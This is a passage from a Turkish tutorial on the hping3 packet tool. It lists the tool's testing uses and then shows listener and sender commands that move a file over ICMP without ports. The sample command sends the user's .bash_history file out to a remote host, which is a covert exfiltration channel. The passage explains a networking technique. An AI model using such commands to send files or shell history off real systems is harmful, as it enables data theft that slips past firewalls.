TCP (Transmission Control Protocol),
UDP (User Datagram Protocol),
ICMP (Internet Control Message Protocol),
Raw paketler üretebilir.
Hping aşağıdaki amaçlar için kullanılabilir:
- Güvenlik duvarı testi
- Gelişmiş port taraması
- Ağ testleri, farklı protokollerle çalışma, TOS, fragmentation
- Manuel biçimde MTU (Maximum Transmission Unit) tespiti
- Desteklenen tüm protokollerin altında gelişmiş traceroute
- Uzaktan işletim sistemi tanımlama
- Uzaktan çalışma süresi tahmin etme
- TCP/IP'yi öğrenmek isteyen öğrencilere yardımcı olma
Yazımızın konusu olan ICMP üzerinden portsuz dosya transferi yapmak için hping aracı aşağıdaki gibi kullanılabilir:
Alıcı taraf (dinleyici makine):
sudo hping3 --listen <ip address> -I <network-interface (eth0,lo, etc)> --sign MSGID1
örnek kulanım: sudo hping3 --listen 8.8.8.8 -I eth0 --sign MSGID1
Gönderici taraf (istemci makine):
sudo hping3 <ip address> --icmp --sign MSGID1 -d 5000 -c 1 --file .bash_history
örnek kulanım:
sudo hping3 8.8.8.8 --icmp --sign MSGID1 -d 5000 -c 1 --file .bash_history
İstemci tarafta komut çalıştırıldığında dinleyici tarafın ekranında .bash_history dosyasının içeriğinin yollandığı görülebilecektir.
Note:
Hping aşağıdaki işletim sistemlerinde çalışır: Linux, FreeBSD, NetBSD, OpenBSD, MacOS X ve Windows.